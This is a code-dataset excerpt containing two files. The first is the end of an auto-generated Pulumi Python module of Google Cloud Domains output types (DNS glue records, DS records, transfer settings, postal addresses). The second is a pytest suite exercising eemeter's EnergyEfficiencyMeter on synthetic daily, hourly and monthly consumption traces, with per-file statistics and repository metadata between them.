Defines a host on your domain that is a DNS name server for your domain and/or other domains. Glue records are a way of making the IP address of a name server known, even when it serves DNS queries for its parent domain. For example, when `ns.example.com` is a name server for `example.com`, the host `ns.example.com` must have a glue record to break the circular DNS reference.
:param str host_name: Domain name of the host in Punycode format.
:param Sequence[str] ipv4_addresses: List of IPv4 addresses corresponding to this host in the standard decimal format (e.g. `198.51.100.1`). At least one of `ipv4_address` and `ipv6_address` must be set.
:param Sequence[str] ipv6_addresses: List of IPv6 addresses corresponding to this host in the standard hexadecimal format (e.g. `2001:db8::`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
pulumi.set(__self__, "host_name", host_name)
pulumi.set(__self__, "ipv4_addresses", ipv4_addresses)
pulumi.set(__self__, "ipv6_addresses", ipv6_addresses)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> str:
"""
Domain name of the host in Punycode format.
"""
return pulumi.get(self, "host_name")
@property
@pulumi.getter(name="ipv4Addresses")
def ipv4_addresses(self) -> Sequence[str]:
"""
List of IPv4 addresses corresponding to this host in the standard decimal format (e.g. `198.51.100.1`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
return pulumi.get(self, "ipv4_addresses")
@property
@pulumi.getter(name="ipv6Addresses")
def ipv6_addresses(self) -> Sequence[str]:
"""
List of IPv6 addresses corresponding to this host in the standard hexadecimal format (e.g. `2001:db8::`). At least one of `ipv4_address` and `ipv6_address` must be set.
"""
return pulumi.get(self, "ipv6_addresses")
@pulumi.output_type
class GoogleDomainsDnsResponse(dict):
"""
Configuration for using the free DNS zone provided by Google Domains as a `Registration`'s `dns_provider`. You cannot configure the DNS zone itself using the API. To configure the DNS zone, go to [Google Domains](https://domains.google/).
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "dsRecords":
suggest = "ds_records"
elif key == "dsState":
suggest = "ds_state"
elif key == "nameServers":
suggest = "name_servers"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in GoogleDomainsDnsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
GoogleDomainsDnsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
GoogleDomainsDnsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ds_records: Sequence['outputs.DsRecordResponse'],
ds_state: str,
name_servers: Sequence[str]):
"""
Configuration for using the free DNS zone provided by Google Domains as a `Registration`'s `dns_provider`. You cannot configure the DNS zone itself using the API. To configure the DNS zone, go to [Google Domains](https://domains.google/).
:param Sequence['DsRecordResponse'] ds_records: The list of DS records published for this domain. The list is automatically populated when `ds_state` is `DS_RECORDS_PUBLISHED`, otherwise it remains empty.
:param str ds_state: The state of DS records for this domain. Used to enable or disable automatic DNSSEC.
:param Sequence[str] name_servers: A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format. This field is automatically populated with the name servers assigned to the Google Domains DNS zone.
"""
pulumi.set(__self__, "ds_records", ds_records)
pulumi.set(__self__, "ds_state", ds_state)
pulumi.set(__self__, "name_servers", name_servers)
@property
@pulumi.getter(name="dsRecords")
def ds_records(self) -> Sequence['outputs.DsRecordResponse']:
"""
The list of DS records published for this domain. The list is automatically populated when `ds_state` is `DS_RECORDS_PUBLISHED`, otherwise it remains empty.
"""
return pulumi.get(self, "ds_records")
@property
@pulumi.getter(name="dsState")
def ds_state(self) -> str:
"""
The state of DS records for this domain. Used to enable or disable automatic DNSSEC.
"""
return pulumi.get(self, "ds_state")
@property
@pulumi.getter(name="nameServers")
def name_servers(self) -> Sequence[str]:
"""
A list of name servers that store the DNS zone for this domain. Each name server is a domain name, with Unicode domain names expressed in Punycode format. This field is automatically populated with the name servers assigned to the Google Domains DNS zone.
"""
return pulumi.get(self, "name_servers")
@pulumi.output_type
class ManagementSettingsResponse(dict):
"""
Defines renewal, billing, and transfer settings for a `Registration`.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "renewalMethod":
suggest = "renewal_method"
elif key == "transferLockState":
suggest = "transfer_lock_state"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ManagementSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ManagementSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ManagementSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
renewal_method: str,
transfer_lock_state: str):
"""
Defines renewal, billing, and transfer settings for a `Registration`.
:param str renewal_method: The renewal method for this `Registration`.
:param str transfer_lock_state: Controls whether the domain can be transferred to another registrar.
"""
pulumi.set(__self__, "renewal_method", renewal_method)
pulumi.set(__self__, "transfer_lock_state", transfer_lock_state)
@property
@pulumi.getter(name="renewalMethod")
def renewal_method(self) -> str:
"""
The renewal method for this `Registration`.
"""
return pulumi.get(self, "renewal_method")
@property
@pulumi.getter(name="transferLockState")
def transfer_lock_state(self) -> str:
"""
Controls whether the domain can be transferred to another registrar.
"""
return pulumi.get(self, "transfer_lock_state")
@pulumi.output_type
class PostalAddressResponse(dict):
"""
Represents a postal address, e.g. for postal delivery or payments addresses. Given a postal address, a postal service can deliver items to a premise, P.O. Box or similar. It is not intended to model geographical locations (roads, towns, mountains). In typical usage an address would be created via user input or from importing existing data, depending on the type of process. Advice on address input / editing: - Use an i18n-ready address widget such as https://github.com/google/libaddressinput) - Users should not be presented with UI elements for input or editing of fields outside countries where that field is used. For more guidance on how to use this schema, please see: https://support.google.com/business/answer/6397478
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "addressLines":
suggest = "address_lines"
elif key == "administrativeArea":
suggest = "administrative_area"
elif key == "languageCode":
suggest = "language_code"
elif key == "postalCode":
suggest = "postal_code"
elif key == "regionCode":
suggest = "region_code"
elif key == "sortingCode":
suggest = "sorting_code"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PostalAddressResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PostalAddressResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PostalAddressResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
address_lines: Sequence[str],
administrative_area: str,
language_code: str,
locality: str,
organization: str,
postal_code: str,
recipients: Sequence[str],
region_code: str,
revision: int,
sorting_code: str,
sublocality: str):
"""
Represents a postal address, e.g. for postal delivery or payments addresses. Given a postal address, a postal service can deliver items to a premise, P.O. Box or similar. It is not intended to model geographical locations (roads, towns, mountains). In typical usage an address would be created via user input or from importing existing data, depending on the type of process. Advice on address input / editing: - Use an i18n-ready address widget such as https://github.com/google/libaddressinput) - Users should not be presented with UI elements for input or editing of fields outside countries where that field is used. For more guidance on how to use this schema, please see: https://support.google.com/business/answer/6397478
:param Sequence[str] address_lines: Unstructured address lines describing the lower levels of an address. Because values in address_lines do not have type information and may sometimes contain multiple values in a single field (e.g. "Austin, TX"), it is important that the line order is clear. The order of address lines should be "envelope order" for the country/region of the address. In places where this can vary (e.g. Japan), address_language is used to make it explicit (e.g. "ja" for large-to-small ordering and "ja-Latn" or "en" for small-to-large). This way, the most specific line of an address can be selected based on the language. The minimum permitted structural representation of an address consists of a region_code with all remaining information placed in the address_lines. It would be possible to format such an address very approximately without geocoding, but no semantic reasoning could be made about any of the address components until it was at least partially resolved. Creating an address only containing a region_code and address_lines, and then geocoding is the recommended way to handle completely unstructured addresses (as opposed to guessing which parts of the address should be localities or administrative areas).
:param str administrative_area: Optional. Highest administrative subdivision which is used for postal addresses of a country or region. For example, this can be a state, a province, an oblast, or a prefecture. Specifically, for Spain this is the province and not the autonomous community (e.g. "Barcelona" and not "Catalonia"). Many countries don't use an administrative area in postal addresses. E.g. in Switzerland this should be left unpopulated.
:param str language_code: Optional. BCP-47 language code of the contents of this address (if known). This is often the UI language of the input form or is expected to match one of the languages used in the address' country/region, or their transliterated equivalents. This can affect formatting in certain countries, but is not critical to the correctness of the data and will never affect any validation or other non-formatting related operations. If this value is not known, it should be omitted (rather than specifying a possibly incorrect default). Examples: "zh-Hant", "ja", "ja-Latn", "en".
:param str locality: Optional. Generally refers to the city/town portion of the address. Examples: US city, IT comune, UK post town. In regions of the world where localities are not well defined or do not fit into this structure well, leave locality empty and use address_lines.
:param str organization: Optional. The name of the organization at the address.
:param str postal_code: Optional. Postal code of the address. Not all countries use or require postal codes to be present, but where they are used, they may trigger additional validation with other parts of the address (e.g. state/zip validation in the U.S.A.).
:param Sequence[str] recipients: Optional. The recipient at the address. This field may, under certain circumstances, contain multiline information. For example, it might contain "care of" information.
:param str region_code: CLDR region code of the country/region of the address. This is never inferred and it is up to the user to ensure the value is correct. See http://cldr.unicode.org/ and http://www.unicode.org/cldr/charts/30/supplemental/territory_information.html for details. Example: "CH" for Switzerland.
:param int revision: The schema revision of the `PostalAddress`. This must be set to 0, which is the latest revision. All new revisions **must** be backward compatible with old revisions.
:param str sorting_code: Optional. Additional, country-specific, sorting code. This is not used in most regions. Where it is used, the value is either a string like "CEDEX", optionally followed by a number (e.g. "CEDEX 7"), or just a number alone, representing the "sector code" (Jamaica), "delivery area indicator" (Malawi) or "post office indicator" (e.g. Côte d'Ivoire).
:param str sublocality: Optional. Sublocality of the address. For example, this can be neighborhoods, boroughs, districts.
"""
pulumi.set(__self__, "address_lines", address_lines)
pulumi.set(__self__, "administrative_area", administrative_area)
pulumi.set(__self__, "language_code", language_code)
pulumi.set(__self__, "locality", locality)
pulumi.set(__self__, "organization", organization)
pulumi.set(__self__, "postal_code", postal_code)
pulumi.set(__self__, "recipients", recipients)
pulumi.set(__self__, "region_code", region_code)
pulumi.set(__self__, "revision", revision)
pulumi.set(__self__, "sorting_code", sorting_code)
pulumi.set(__self__, "sublocality", sublocality)
@property
@pulumi.getter(name="addressLines")
def address_lines(self) -> Sequence[str]:
"""
Unstructured address lines describing the lower levels of an address. Because values in address_lines do not have type information and may sometimes contain multiple values in a single field (e.g. "Austin, TX"), it is important that the line order is clear. The order of address lines should be "envelope order" for the country/region of the address. In places where this can vary (e.g. Japan), address_language is used to make it explicit (e.g. "ja" for large-to-small ordering and "ja-Latn" or "en" for small-to-large). This way, the most specific line of an address can be selected based on the language. The minimum permitted structural representation of an address consists of a region_code with all remaining information placed in the address_lines. It would be possible to format such an address very approximately without geocoding, but no semantic reasoning could be made about any of the address components until it was at least partially resolved. Creating an address only containing a region_code and address_lines, and then geocoding is the recommended way to handle completely unstructured addresses (as opposed to guessing which parts of the address should be localities or administrative areas).
"""
return pulumi.get(self, "address_lines")
@property
@pulumi.getter(name="administrativeArea")
def administrative_area(self) -> str:
"""
Optional. Highest administrative subdivision which is used for postal addresses of a country or region. For example, this can be a state, a province, an oblast, or a prefecture. Specifically, for Spain this is the province and not the autonomous community (e.g. "Barcelona" and not "Catalonia"). Many countries don't use an administrative area in postal addresses. E.g. in Switzerland this should be left unpopulated.
"""
return pulumi.get(self, "administrative_area")
@property
@pulumi.getter(name="languageCode")
def language_code(self) -> str:
"""
Optional. BCP-47 language code of the contents of this address (if known). This is often the UI language of the input form or is expected to match one of the languages used in the address' country/region, or their transliterated equivalents. This can affect formatting in certain countries, but is not critical to the correctness of the data and will never affect any validation or other non-formatting related operations. If this value is not known, it should be omitted (rather than specifying a possibly incorrect default). Examples: "zh-Hant", "ja", "ja-Latn", "en".
"""
return pulumi.get(self, "language_code")
@property
@pulumi.getter
def locality(self) -> str:
"""
Optional. Generally refers to the city/town portion of the address. Examples: US city, IT comune, UK post town. In regions of the world where localities are not well defined or do not fit into this structure well, leave locality empty and use address_lines.
"""
return pulumi.get(self, "locality")
@property
@pulumi.getter
def organization(self) -> str:
"""
Optional. The name of the organization at the address.
"""
return pulumi.get(self, "organization")
@property
@pulumi.getter(name="postalCode")
def postal_code(self) -> str:
"""
Optional. Postal code of the address. Not all countries use or require postal codes to be present, but where they are used, they may trigger additional validation with other parts of the address (e.g. state/zip validation in the U.S.A.).
"""
return pulumi.get(self, "postal_code")
@property
@pulumi.getter
def recipients(self) -> Sequence[str]:
"""
Optional. The recipient at the address. This field may, under certain circumstances, contain multiline information. For example, it might contain "care of" information.
"""
return pulumi.get(self, "recipients")
@property
@pulumi.getter(name="regionCode")
def region_code(self) -> str:
"""
CLDR region code of the country/region of the address. This is never inferred and it is up to the user to ensure the value is correct. See http://cldr.unicode.org/ and http://www.unicode.org/cldr/charts/30/supplemental/territory_information.html for details. Example: "CH" for Switzerland.
"""
return pulumi.get(self, "region_code")
@property
@pulumi.getter
def revision(self) -> int:
"""
The schema revision of the `PostalAddress`. This must be set to 0, which is the latest revision. All new revisions **must** be backward compatible with old revisions.
"""
return pulumi.get(self, "revision")
@property
@pulumi.getter(name="sortingCode")
def sorting_code(self) -> str:
"""
Optional. Additional, country-specific, sorting code. This is not used in most regions. Where it is used, the value is either a string like "CEDEX", optionally followed by a number (e.g. "CEDEX 7"), or just a number alone, representing the "sector code" (Jamaica), "delivery area indicator" (Malawi) or "post office indicator" (e.g. Côte d'Ivoire).
"""
return pulumi.get(self, "sorting_code")
@property
@pulumi.getter
def sublocality(self) -> str:
"""
Optional. Sublocality of the address. For example, this can be neighborhoods, boroughs, districts.
"""
return pulumi.get(self, "sublocality")
| 58.567834
| 1,947
| 0.689526
| 6,873
| 53,531
| 5.249236
| 0.103303
| 0.011253
| 0.016936
| 0.024752
| 0.776207
| 0.75625
| 0.744138
| 0.725317
| 0.714424
| 0.698182
| 0
| 0.006861
| 0.218602
| 53,531
| 913
| 1,948
| 58.631982
| 0.85565
| 0.566588
| 0
| 0.435115
| 1
| 0.020992
| 0.193975
| 0.035538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177481
| false
| 0
| 0.013359
| 0
| 0.347328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea5e3bc383e39e708eeff6005f6306040d99a9c
| 40,039
|
py
|
Python
|
tests/ee/test_energy_efficiency_meter.py
|
OpenTechStrategies/eemeter
|
ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca
|
[
"Apache-2.0"
] | null | null | null |
tests/ee/test_energy_efficiency_meter.py
|
OpenTechStrategies/eemeter
|
ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca
|
[
"Apache-2.0"
] | 1
|
2018-06-14T04:24:49.000Z
|
2018-06-14T04:24:49.000Z
|
tests/ee/test_energy_efficiency_meter.py
|
OpenTechStrategies/eemeter
|
ed38b00c665cf0eb0aa68e9b2a4cd190b5bcf7ca
|
[
"Apache-2.0"
] | null | null | null |
from io import BytesIO
import numpy as np
import re
import pkg_resources
import tempfile
import pandas as pd
import pytest
import pytz
import json
from eemeter.ee.meter import EnergyEfficiencyMeter
from eemeter.modeling.formatters import ModelDataBillingFormatter
from eemeter.modeling.models import CaltrackMonthlyModel, CaltrackDailyModel
@pytest.fixture
def project_meter_input():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "91104",
"project_id": "PROJECT_1",
"modeling_period_group": {
"baseline_period": {
"start": None,
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": None
}
}
}
@pytest.fixture
def project_meter_input_bad_zipcode():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "11111", # not valid
"modeling_period_group": {
"baseline_period": {
"start": None,
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": None
}
}
}
@pytest.fixture
def project_meter_input_with_period_start_end():
return {
"type": "PROJECT_WITH_SINGLE_MODELING_PERIOD_GROUP",
"zipcode": "91104",
"project_id": "PROJECT_1",
"modeling_period_group": {
"baseline_period": {
"start": "2013-01-01T00:00:00+00:00",
"end": "2014-01-01T00:00:00+00:00"
},
"reporting_period": {
"start": "2014-02-01T00:00:00+00:00",
"end": "2015-02-01T00:00:00+00:00",
}
}
}
def _electricity_input(records):
return {
"type": "ARBITRARY_START",
"interpretation": "ELECTRICITY_CONSUMPTION_SUPPLIED",
"unit": "KWH",
"records": records
}
def _natural_gas_input(records):
return {
"type": "ARBITRARY_START",
"interpretation": "NATURAL_GAS_CONSUMPTION_SUPPLIED",
"unit": "THERM",
"trace_id": "TRACE_1",
"records": records
}
@pytest.fixture
def meter_input_daily(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_hourly(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4 * 24, freq='H', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0 + dt.hour,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'hourly'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_elec(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _electricity_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_empty(project_meter_input):
records = []
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_baseline_only(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 1, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_reporting_only(project_meter_input):
record_starts = pd.date_range(
'2014-02-01', periods=365 * 1, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _natural_gas_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_daily_with_period_start_end(
project_meter_input_with_period_start_end):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
trace = _natural_gas_input(records)
trace.update({'interval': 'daily'})
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": trace,
"project": project_meter_input_with_period_start_end,
}
return meter_input
@pytest.fixture
def meter_input_monthly(project_meter_input, ):
record_starts = pd.date_range(
'2012-01-01', periods=60, freq='MS', tz=pytz.UTC)
monthly_heating_cooling_pattern = {
1: 31,
2: 31,
3: 25,
4: 13,
5: 0,
6: 12,
7: 19,
8: 19,
9: 13,
10: 1,
11: 12,
12: 24,
}
records = [
{
"start": dt.isoformat(),
"value": monthly_heating_cooling_pattern[dt.month],
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _electricity_input(records),
"project": project_meter_input,
}
return meter_input
@pytest.fixture
def meter_input_strange_interpretation(project_meter_input):
record_starts = pd.date_range(
'2012-01-01', periods=365 * 4, freq='D', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": {
"type": "ARBITRARY_START",
"interpretation": "ELECTRICITY_CONSUMPTION_NET",
"unit": "therm",
"records": records
},
"project": project_meter_input
}
return meter_input
@pytest.fixture
def meter_input_bad_zipcode(project_meter_input_bad_zipcode):
record_starts = pd.date_range(
'2012-01-01', periods=50, freq='MS', tz=pytz.UTC)
records = [
{
"start": dt.isoformat(),
"value": 1.0,
"estimated": False
} for dt in record_starts
]
meter_input = {
"type": "SINGLE_TRACE_SIMPLE_PROJECT",
"trace": _electricity_input(records),
"project": project_meter_input_bad_zipcode,
}
return meter_input
def test_basic_usage_daily(
meter_input_daily, monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
baseline_observed = {d['series']:d for d in derivatives}['Observed, baseline period']
reporting_observed = {d['series']:d for d in derivatives}['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 32
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_daily_supplied_weather_source(
meter_input_daily, monkeypatch_temperature_data,
mock_isd_weather_source):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily,
weather_source=mock_isd_weather_source)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['project_id'] == 'PROJECT_1'
assert results['trace_id'] == 'TRACE_1'
assert results['interval'] == 'daily'
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
baseline_observed = {d['series']:d for d in derivatives}['Observed, baseline period']
reporting_observed = {d['series']:d for d in derivatives}['Observed, reporting period']
assert (baseline_observed['orderable'][0], baseline_observed['orderable'][-1]) == ('2012-01-01T00:00:00+00:00', '2014-01-01T00:00:00+00:00')
assert (reporting_observed['orderable'][0], reporting_observed['orderable'][-1]) == ('2014-02-01T00:00:00+00:00', '2015-12-30T00:00:00+00:00')
assert len(derivatives) == 32
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
'Reporting model, normal year',
'Baseline model, baseline period',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_monthly(
meter_input_monthly,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_monthly)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackMonthlyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataBillingFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 36
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
'Baseline model, normal year',
'Cumulative reporting model, normal year',
'Baseline model minus reporting model, normal year',
'Reporting model, normal year',
'Cumulative baseline model minus observed, reporting period',
'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
'Baseline model minus observed, reporting period',
'Baseline model, reporting period',
'Observed, reporting period',
'Masked baseline model minus observed, reporting period',
'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
'Heating degree day balance point, reporting period',
'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
'Best-fit intercept, reporting period',
'Best-fit heating coefficient, baseline period',
'Best-fit heating coefficient, reporting period',
'Best-fit cooling coefficient, baseline period',
'Best-fit cooling coefficient, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
def test_basic_usage_baseline_only(
meter_input_daily_baseline_only,
monkeypatch_temperature_data):
meter = EnergyEfficiencyMeter()
results = meter.evaluate(meter_input_daily_baseline_only)
assert results['status'] == 'SUCCESS'
assert results['failure_message'] is None
assert len(results['logs']) == 2
assert results['eemeter_version'] is not None
assert results['meter_kwargs'] == {}
assert results['model_class'] == 'CaltrackDailyModel'
assert results['model_kwargs'] is not None
assert results['formatter_class'] == 'ModelDataFormatter'
assert results['formatter_kwargs'] is not None
assert results['modeled_energy_trace'] is not None
derivatives = results['derivatives']
assert len(derivatives) == 18
assert derivatives[0]['modeling_period_group'] == \
('baseline', 'reporting')
assert derivatives[0]['orderable'] == [None]
source_series = set([d['series'] for d in derivatives])
assert source_series == set([
# 'Cumulative baseline model minus reporting model, normal year',
'Cumulative baseline model, normal year',
# 'Cumulative reporting model, normal year',
# 'Baseline model minus reporting model, normal year',
'Baseline model, normal year',
# 'Reporting model, normal year',
# 'Cumulative baseline model minus observed, reporting period',
# 'Cumulative baseline model, reporting period',
'Cumulative observed, reporting period',
# 'Baseline model minus observed, reporting period',
# 'Baseline model, reporting period',
'Observed, reporting period',
# 'Masked baseline model minus observed, reporting period',
# 'Masked baseline model, reporting period',
'Masked observed, reporting period',
'Baseline model, baseline period',
#'Reporting model, reporting period',
'Cumulative observed, baseline period',
'Observed, baseline period',
'Observed, project period',
'Inclusion mask, baseline period',
'Inclusion mask, reporting period',
'Temperature, baseline period',
'Temperature, reporting period',
'Temperature, normal year',
'Masked temperature, reporting period',
'Heating degree day balance point, baseline period',
'Cooling degree day balance point, baseline period',
#'Heating degree day balance point, reporting period',
#'Cooling degree day balance point, reporting period',
'Best-fit intercept, baseline period',
#'Best-fit intercept, reporting period',
])
for d in derivatives:
assert isinstance(d['orderable'], list)
assert isinstance(d['value'], list)
assert isinstance(d['variance'], list)
assert len(d['orderable']) == len(d['value']) == len(d['variance'])
json.dumps(results)
